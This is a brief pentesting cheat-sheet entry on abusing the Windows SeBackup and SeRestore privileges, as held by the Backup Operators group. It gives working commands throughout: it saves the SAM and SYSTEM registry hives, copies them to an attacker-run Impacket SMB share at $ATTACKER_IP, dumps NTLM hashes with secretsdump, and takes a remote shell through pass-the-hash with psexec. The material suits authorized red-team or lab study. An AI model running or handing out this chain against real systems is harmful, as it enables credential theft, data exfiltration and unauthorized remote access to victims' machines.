These permission allow full read (SeBackup) and write (SeRestore) access to any file. The first of these allows for exfiltration, while the second allows binaries to be replaced at will (combine with service- or task-based attacks!). The “Backup Operators” group has both of these permissions!
Backup useful registry hives:
reg save HKLM\SYSTEM $PATH_TO_HIVE_FILE
reg save HKLM\SAM $PATH_TO_HIVE_FILERun a local SMB server with Impacket:
impacket-smbserver -smb2support -username $CONNECTION_USER \
-password $CONNECTION_PASSWORD $SHARE_NAME $PATH_TO_DIRECTORYThen, just use copy on Windows:
copy $FILE \\$ATTACKER_IP\$SHARE_NAME\Use Impacket to dump hashes from a hive and perform a pass-the-hash attack:
# Get hashes from SAM/SYSTEM hives
#
impacket-secretsdump -sam $SAM_HIVE_FILE \
-system $SYSTEM_HIVE_FILE LOCAL
# Get a shell by passing a hash
#
impacket-psexec -hashes $FULL_NTLM_HASH $TARGET_USER@$TARGET_IP